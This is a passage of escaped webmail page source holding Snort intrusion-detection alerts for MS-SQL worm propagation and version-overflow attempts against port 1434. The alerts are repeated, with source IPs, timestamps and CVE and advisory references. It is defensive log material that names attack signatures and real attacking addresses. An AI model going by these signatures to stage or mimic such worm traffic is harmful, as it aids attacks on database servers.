=&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;script&gt;&lt;!-- D(["mb"," [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:28:04.702026 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://218.232.95.60:3664\" target\u003d_blank\&gt;218.232.95.60:3664\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc activity] [Priority: 3]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:28:04.702026 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://218.232.95.60:3664\" target\u003d_blank\&gt;218.232.95.60:3664\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt;",1] );  //--&gt;&lt;/script&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-15:28:04.702026 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://218.232.95.60:3664/" target="_blank"&gt;218.232.95.60:3664&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc activity] [Priority: 3]&lt;br /&gt;&lt;br /&gt; 08/14-15:28:04.702026 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://218.232.95.60:3664/" target="_blank"&gt;218.232.95.60:3664&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt;&lt;script&gt;&lt;!-- D(["mb"," Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref\" target\u003d_blank\&gt;http://www.microsoft.com\u003cwbr /\&gt;/technet/security/bulletin\u003cwbr /\&gt;/MS02-039.mspx][Xref\u003c/a\&gt;\u003cbr /\&gt;\u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d10674][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d10674][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:42:58.867441 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://202.106.102.195:1071\" target\u003d_blank\&gt;202.106.102.195:1071\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;",1] );  //--&gt;&lt;/script&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx%5D%5BXref" target="_blank"&gt;http://www.microsoft.com&lt;wbr&gt;/technet/security/bulletin&lt;wbr&gt;/MS02-039.mspx][Xref&lt;/a&gt;&lt;br /&gt;=&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=10674%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=10674][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-15:42:58.867441 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://202.106.102.195:1071/" target="_blank"&gt;202.106.102.195:1071&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;&lt;script&gt;&lt;!-- D(["mb","/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:42:58.867441 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://202.106.102.195:1071\" target\u003d_blank\&gt;202.106.102.195:1071\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]\u003cbr /\&gt;",1] );  //--&gt;&lt;/script&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-15:42:58.867441 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://202.106.102.195:1071/" target="_blank"&gt;202.106.102.195:1071&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]&lt;br /&gt;&lt;script&gt;&lt;!-- D(["mb","\u003cbr /\&gt; [Classification: Misc activity] [Priority: 3]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:42:58.867441 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://202.106.102.195:1071\" target\u003d_blank\&gt;202.106.102.195:1071\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref\" target\u003d_blank\&gt;http://www.microsoft.com\u003cwbr /\&gt;/technet/security/bulletin\u003cwbr /\&gt;/MS02-039.mspx][Xref\u003c/a\&gt;\u003cbr /\&gt;\u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d10674][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d10674][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-19:15:19.388509 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://221.195.73.84:1042\" target\u003d_blank\&gt;221.195.73.84:1042\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;",1] );  //--&gt;&lt;/script&gt;&lt;br /&gt; [Classification: Misc activity] [Priority: 3]&lt;br /&gt;&lt;br /&gt; 08/14-15:42:58.867441 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://202.106.102.195:1071/" target="_blank"&gt;202.106.102.195:1071&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx%5D%5BXref" target="_blank"&gt;http://www.microsoft.com&lt;wbr&gt;/technet/security/bulletin&lt;wbr&gt;/MS02-039.mspx][Xref&lt;/a&gt;&lt;br /&gt;=&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=10674%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=10674][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-19:15:19.388509 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://221.195.73.84:1042/" target="_blank"&gt;221.195.73.84:1042&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;&lt;script&gt;&lt;!-- D(["mb","/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-19:15:19.388509 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://221.195.73.84:1042\" target\u003d_blank\&gt;221.195.73.84:1042\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;",1] );  //--&gt;&lt;/script&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" 